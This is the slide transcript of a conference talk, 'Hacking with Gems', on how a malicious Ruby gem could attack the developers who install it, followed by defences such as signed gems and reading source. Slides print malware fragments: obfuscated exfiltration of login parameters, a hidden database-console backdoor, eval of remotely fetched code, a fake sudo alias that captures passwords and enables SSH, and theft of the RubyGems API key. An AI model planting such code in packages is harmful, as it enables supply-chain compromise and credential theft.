Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (Ancient City Ruby)

6d48d3849102b57bbc1462c0da0b3866?s=47 Benjamin Smith
April 05, 2013
Technology
5
1k

Hacking with Gems (Ancient City Ruby)

6d48d3849102b57bbc1462c0da0b3866?s=128

Benjamin Smith

April 05, 2013
Tweet

More Decks by Benjamin Smith

See All by Benjamin Smith
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
0
70
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
4
690
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
0
91
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
2
200
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
1
87
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
2
350
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
4
370
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
1
190
6d48d3849102b57bbc1462c0da0b3866?s=48 benjaminleesmith
4
1k

Other Decks in Technology

See All in Technology
96de66872f54da75c05c881c7a3713ce?s=48 kenya888
1
100
5c3556b7c8c0ab6bc90a62161a8315f8?s=48 gracia
0
890
F4d37a67ce86b2f962c79d73a9127d3c?s=48 fortkle
0
450
86a4debb9747d504f526e6dd2efd5d0b?s=48 5ebec
0
160
F3c727195d975cf7a4b300e4f5c2c0d1?s=48 am7cinnamon
1
290
272ea9518ccdb2ed71b73ac87b7901f8?s=48 hponka
0
170
19fc8f6113c5c3d86e6176362ff29479?s=48 kanaugust
PRO
0
200
D069523c85d56ebf004c9695bca578c0?s=48 kenichimunezawa
0
810
8065fe5a0d33908c6f71c5ae28939dcd?s=48 ayatokura
0
240
Fe475df4e28cef1175a787fb032e0489?s=48 bolonio
4
560
93fc2d713bc4d0e9c594bf8c9e6bcc62?s=48 oztick139
0
710
53850955f15249a1a9dc49df6113e400?s=48 line_developers
PRO
1
330

Featured

See All Featured
1519587b1a0febb658c36c94f6272b0d?s=48 roundedbygravity
242
21k
0fe2973fa8d27d96547e43322341183a?s=48 swwweet
206
6.9k
B83d5b590577969ee79a5ad845411a7d?s=48 ammeep
656
54k
Aff5641764408271f7bc398f2097edd0?s=48 denniskardys
220
120k
9128d500301ae51524e887bb680f471d?s=48 caitiem20
311
17k
E190023b66e2b8aa73a842b106920c93?s=48 zenorocha
296
40k
9fa239b3154a0169d99ab7bf1422dd12?s=48 marcelosomers
221
15k
Fe6b81005d1553accd6b2a28f6a2bef1?s=48 phodgson
88
4k
D83926c323d4f9289f947b4b4e76b939?s=48 jensimmons
208
10k
24fc194843a71f10949be18d5a692682?s=48 gr2m
83
11k
1b8ad785acdd1ce1c99914b1c2a4e10e?s=48 sugarenia
233
880k
7edec06b5435e0dac07a353b2cc26253?s=48 geeforr
333
29k

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How-to get rich quick and (maybe) not go to jail!

  3. Ben Smith cannot be held accountable for anything that will

    happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.

  4. who i am

  5. None
  6. None
  7. None

  8. what i am NOT

  9. None

  10. please do not try this at home

  11. please do not try this at home

  12. how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12)

    actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ...

  13. what’s the worst that could happen?

  14. None

  15. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  16. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  17. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  18. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  19. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

  20. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

  21. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  22. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

  23. “development.log” ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  24. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

  26. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

  27. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  28. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  29. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  30. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  31. a one way ticket to

  32. that was easy. what else can I do?

  33. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  34. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

  35. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  36. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  37. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  38. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

  39. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  40. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  41. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  42. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  43. /users/sign_in github.com/benjaminleesmith/net_http_detector

  44. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  45. hello db access! github.com/benjaminleesmith/net_http_detector

  46. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  47. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  48. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  49. careful of wolves in sheep’s clothing

  50. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

  51. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

  52. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  53. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  54. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  55. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  56. i like the beach

  57. that was easy. what else can I do?

  58. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  59. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  60. None

  61. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  62. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

  63. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

  64. what what github.com/benjaminleesmith/better_date_to_s

  65. i can haz source github.com/benjaminleesmith/better_date_to_s

  66. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

  67. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  68. that was easy hard. what else can I do? (that's

    easier)

  69. gem install be_truthy github.com/benjaminleesmith/be_truthy

  70. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

  71. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  72. github.com/benjaminleesmith/be_truthy

  73. file tree looks ok github.com/benjaminleesmith/be_truthy

  74. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  75. but what was this? github.com/benjaminleesmith/be_truthy

  76. I see no C github.com/benjaminleesmith/be_truthy

  77. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

  78. there is no Rakefile github.com/benjaminleesmith/be_truthy

  79. the real file tree github.com/benjaminleesmith/be_truthy

  80. the real file tree github.com/benjaminleesmith/be_truthy

  81. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  82. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

  83. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

  84. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  85. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  86. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  87. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  88. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  89. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  90. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  91. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

  92. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  93. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  94. take away: don't install ben's gems

  95. None

  96. how could I get you to install my gems?

  97. what gems are trustworthy?

  98. how can I add my code to already trusted gems?

  99. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

  100. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  101. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  102. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  103. now I own your gems github.com/benjaminleesmith/be_truthy

  104. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy

  105. do people trust your gems?

  106. do people who install your gems have trustworthy gems?

  107. None

  108. there’s still one problem

  109. bootstrapping

  110. being popular sucks

  111. conferences

  112. webmock

  113. rspec-given

  114. quacky

  115. social engineering

  116. None
  117. None

  118. • matt • smoe • bttf • james • tlittle

    • rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb

  119. so what happens now?

  120. ruby gems goes down

  121. heroku deploys go down

  122. i go to the beach

  123. ruby gems goes down

  124. heroku deploys go down

  125. recovery

  126. so what now?

  127. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  128. Little Snitch obdev.at/products/littlesnitch/index.html

  129. gem install be_truthy github.com/benjaminleesmith/be_truthy

  130. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  131. don’t “gem install” from strangers

  132. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  133. None
  134. None

  135. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

  136. gem install rails -P HighSecurity

  137. > gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:

    While executing gem ... (Gem::Exception) Unsigned gem

  138. gem cert --build

  139. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust

  140. sandboxing

  141. github.com/rubygems/rubygems

  142. tools to detect malicious code

  143. private gem repos

  144. do not try this at home

  145. don't install gems you don't need to

  146. pay attention to what your gems do

  147. monitor your system

  148. read the source

  149. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  150. on install github.com/benjaminleesmith/coal-mine-canary

  151. the results github.com/benjaminleesmith/coal-mine-canary

  152. thank you!

  153. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith